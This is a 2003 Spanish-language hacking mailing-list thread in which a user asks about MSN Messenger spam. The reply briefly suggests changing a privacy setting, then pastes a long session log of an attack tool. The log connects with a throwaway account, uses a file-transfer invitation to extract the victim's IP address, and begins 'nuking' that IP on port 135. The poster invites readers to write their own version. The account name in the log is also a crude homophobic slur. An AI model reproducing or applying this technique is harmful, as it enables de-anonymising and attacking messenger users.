[HACK] Nuevo modo de SPAM, privados en el messenger.

Rafael Nuñez rnunez at scientech.com.ve
Mon May 19 15:55:25 CEST 2003 



Hola.  Windows Messenger es fácil de mandar mensajes spam por medio de un
debug exploit. Pero en la ultima versión ya puedes controlar eso.

Si usas un sniffer como ethereal  sabrás como funciona

Te recomiendo en las opciones de Messenger  desactivar la opción de The
Customer Experience Improvement Program. Ahí estas expuestos a que te envíen
Spam. Más mentiras en:   http://messenger.microsoft.com/support/sqm.asp

Hay otra opción para no recibir Spam en Windows Messenger la última versión.
No Se en amsn


Ejemplo del exploit para que le den una idea y programen el suyo :) 


./debugger victima at hotmail.com 

Debug mode is switched on..

Attack mode is switched on..

victim = victima at hotmail.com..

Random mode switched on..

Using acct power-to-the-gay-community at god-save-joe-harley.co.uk..

Connecting to messenger.hotmail.com on port 1863...
Connected!...

S: VER 0 MSNP5
DS
C: INF 1
DS
S: INF 1 MD5
DS
C: USR 2 MD5 I power-to-the-gay-community at god-save-joe-harley.co.uk
DS
S: XFR 2 NS 207.46.106.117:1863 0

Connecting to 207.46.106.117 on port 1863...
Connected!...
NS
C: VER 3 MSNP7 MSNP6 MSNP5 MSNP4 CVR0
NS
S: VER 3 MSNP7 MSNP6 MSNP5 MSNP4 CVR0
NS
C: INF 4
NS
S: INF 4 MD5
NS
C: USR 5 MD5 I power-to-the-gay-community at god-save-joe-harley.co.uk
NS
S: USR 5 MD5 S 1053351928.16572
NS
C: USR 6 MD5 S 3443d8ffa64fd9e824fb423cafbd3b1a
NS
S: USR 6 OK power-to-the-gay-community at god-save-joe-harley.co.uk
power-to-the-ga
y-community at god-save-joe-harley.co.uk%20(E-mail%20Address%20Not%20Verified)
0
NS
C: CHG 7 NLN
NS
S: MSG Hotmail Hotmail 415
MIME-Version: 1.0
Content-Type: text/x-msmsgsprofile; charset=UTF-8
LoginTime: 1053351928
EmailEnabled: 0
MemberIdHigh: 245757
MemberIdLow: -2096508346
lang_preference: 0
preferredEmail:
country:
PostalCode:
Gender: U
Kid: 0
Age:
BDayPre: 0
Birthday: 0
Wallet: 0
Flags: 512
sid: 507
kv: 4
MSPAuth:
4ai0AQN3HDRRP2l40WgvdyNqL3RZ3KzUGtgnRc6FoJu66XYAKY2ikTVj*SFUGi*nWx!YSOw
L8B0kX5c*fEvmsCRg$$

NS
C: XFR 8 SB
NS
S: CHG 7 NLN
NS
S: XFR 8 SB 207.46.108.80:1863 CKI 16982004.1053351929.12714

Connecting to 207.46.108.80 on port 1863...
Connected!...
SB
C: USR 0 power-to-the-gay-community at god-save-joe-harley.co.uk
16982004.105335192
9.12714
SB
S: USR 0 OK power-to-the-gay-community at god-save-joe-harley.co.uk
power-to-the-ga
y-community at god-save-joe-harley.co.uk%20(E-mail%20Address%20Not%20Verified)
SB
S: CAL 1 RINGING 16982004
SB
S: JOI victima at hotmail.com El%GOZON
SB
S: MSG victima at hotmail.com EL$GOZON 308
MIME-Version: 1.0
Content-Type: text/x-msmsgsinvite; charset=UTF-8

Invitation-Command: ACCEPT
Invitation-Cookie: 1
IP-Address: 200.44.179.130
IP-Address-Internal: 10.10.10.8
PortX-Internal: 11178
Port: 6891
PortX: 11178
AuthCookie: 5020709
Launch-Application: FALSE
Request-Data: IP-Address:

victima at hotmail.com' s ip = 200.44.179.130

Attempting to nuke 200.44.179.130.. standby

Connecting to 200.44.179.130 on port 135...

;-)



Saludos


Rafael Núñez
Inteligencia
Scientech de Venezuela
e-mail: rnunez at scientech.com.ve
Web: www.scientech.com.ve
Tlf.:  (58-212) 952.42.66
Fax: (58-212) 951.36.35


-----Mensaje original-----
De: hacking-bounces at argo.es [mailto:hacking-bounces at argo.es] En nombre de
Angel Alonso Párrizas
Enviado el: Saturday, May 17, 2003 12:42 PM
Para: hacking at argo.es
Asunto: [HACK] Nuevo modo de SPAM, privados en el messenger.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

En estos últimos días estoy recibiendo una peculiar forma de SPAM que me 
sorprende y a la cual de momento no he podido poner remedio. La idea es que 
tu tienes ejecutandose tu cliente MSN, en mi caso amsn, y te abren un
privado 
donde te invitan a que visites una web con contenido porno. El caso es que
yo 
pregunto si yo no he recibido ningún mensaje de aceptación de ese usuario en

mi lista ¿como narices puede abrirme un privado sin estar dado de alta en mi

lista? ¿qué puedo hacer para evitar esto?.

Gracias. 
- -- 

Angel Alonso Párrizas 
parrizas at wanadoo.es
SMS: http://tanguita.no-ip.org/sms.html
___________________________________
"La libertad no es algo negociable"

Linux user: #217062. ID GPG: 1024D/F26C88DD 
Huella dactilar = B87F 9B8B 5BBC AB84 D3F6  ABFD 0086 FC9D F26C 88DD
ICQ:122403354
http://angelillo.no-ip.org
http://mural.uv.es/apan 
 
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+xmZwAIb8nfJsiN0RApdaAJ0QwKuvcZkgF1o8BjwREpEkhxSHyQCfdrGI
7IrbUUFifhBenT8bwaTpYiQ=
=0Zpk
-----END PGP SIGNATURE-----


_______________________________________________
Lista - http://mailman.argo.es/listinfo/hacking
FAQ - http://www.argo.es/~jcea/artic/hack-faq.htm
"una-al-dia" para estar siempre informado - http://www.hispasec.com/

More information about the hacking mailing list